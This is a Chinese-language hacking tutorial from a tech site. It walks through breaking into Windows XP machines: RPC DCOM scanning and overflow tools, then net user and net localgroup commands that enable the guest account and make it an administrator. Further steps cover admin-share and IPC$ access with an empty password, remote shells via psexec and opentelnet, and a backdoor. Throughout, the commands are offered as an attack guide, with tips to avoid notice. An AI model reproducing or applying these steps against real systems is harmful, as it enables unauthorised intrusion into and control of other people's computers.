Your Ad Here
首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 黑客技术 > 入侵xp系统之初步攻略
【标  题】:入侵xp系统之初步攻略
【关键字】:系统,xp,攻略,入侵,xp
【来  源】:网络

入侵xp系统之初步攻略

Your Ad Here 1.思路:突破xp系统远程访问的限制,实现文件传输和远程登陆。

2.工具:rpc漏洞扫描工具、溢出工具,pstools工具包。

3.步骤
1)步骤一:rpc漏洞扫描:
推荐使用retinarpcdcom.exe
图形界面,在剑鹰网络安全小组有下载。

2)步骤二:远程溢出:
在剑鹰网络安全小组有很多该类工具下载,我用xp.exe,溢出成功率极高。

3)步骤三:提升guest权限(本方案之关键):
命令:net user guest /active:yes
net localgroup aministrators guest /add
——————————————————————————————
看到这里,也许你会嗤之以鼻,
可这正是大家忽略的地方,因为guest有与其它所有帐号不同的特性。
如果你用net user guest命令,将会看到下面的内容:
Password required No
这正是突破xp系统远程访问帐号限制的突破口!
除了guest外,其它帐号都是
Password required yes
所以就算你有xp系统的管理员帐号密码一样无所作为。
——————————————————————————————
当guest提升为admin权限后,你试试
dir \\IP\c$Content$nbsp;
现在你已经有了读写权限,连ipc$连接都省了~~
当然你也一样可以用net use \\ip "" /user:"guest"来进行IPC$连接。
到此,文件传输的问题已经解决!

4)步骤四:远程登陆
我们当然不想每次用溢出登陆对方。
那么就试试opentelnet吧
>opentelnet \\ip guest "" 1 90
read ntlm failed \\shit!用administrator也是这样子。
上传srv.exe试试,我没试过,有兴趣的自己试试。
因为我认为用psexec方便多了。命令如下:
psexec \\ip cmd
5)关于后门:
各显神通,我正好用来试试榕哥的bits.dll,感觉一点都不好。
6)注意事项:
千万别在xp系统中建新帐户(为什么?自己想想)
xp系统默认只能登陆一个帐户,故用3389的远程登陆是不行的。
rpc溢出会导致对方重启,要慎用,尤其是服务器。
手把手教你NT入侵:【上一篇】
一次渗透测试的过程:【下一篇】
【相关文章】
  • 手把手教你NT入侵
  • 匿名用户入侵NT获得Admin权限
  • 从UNIX系统获取密码档(一) 上
  • 从UNIX系统获取密码档(一) 下
  • 从UNIX系统获取密码档(二) 上
  • 从UNIX系统获取密码档(二) 下
  • 从UNIX系统获取密码档(三)
  • 远程入侵---溢出篇
  • 修改xp-terminal server client目标端口的方法
  • 利用最基本的SQL注入渗透BBSXP官方网站的台后管理
  • 【随机文章】
  • java在Linux下的web应用(2)
  • 蠕虫病毒“恶鹰变种”分析报告(3)
  • 如何操作控制面板 (control panel) 才能使p5服务器立即关机
  • 验证控件中显示的信息要换行竟然要用“<br>" 啊
  • Pro/Engineer Drawing 工程图尺寸修改
  • DELPHI基础教程--第七章 剪贴板和动态数据交换(一)
  • 将openssh升级到3.8p1
  • java版本的飞鸽编写(一)
  • 交叉数据报表
  • 面试中遇到的问题
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 bbb软讯网络 All Rigths Reserved.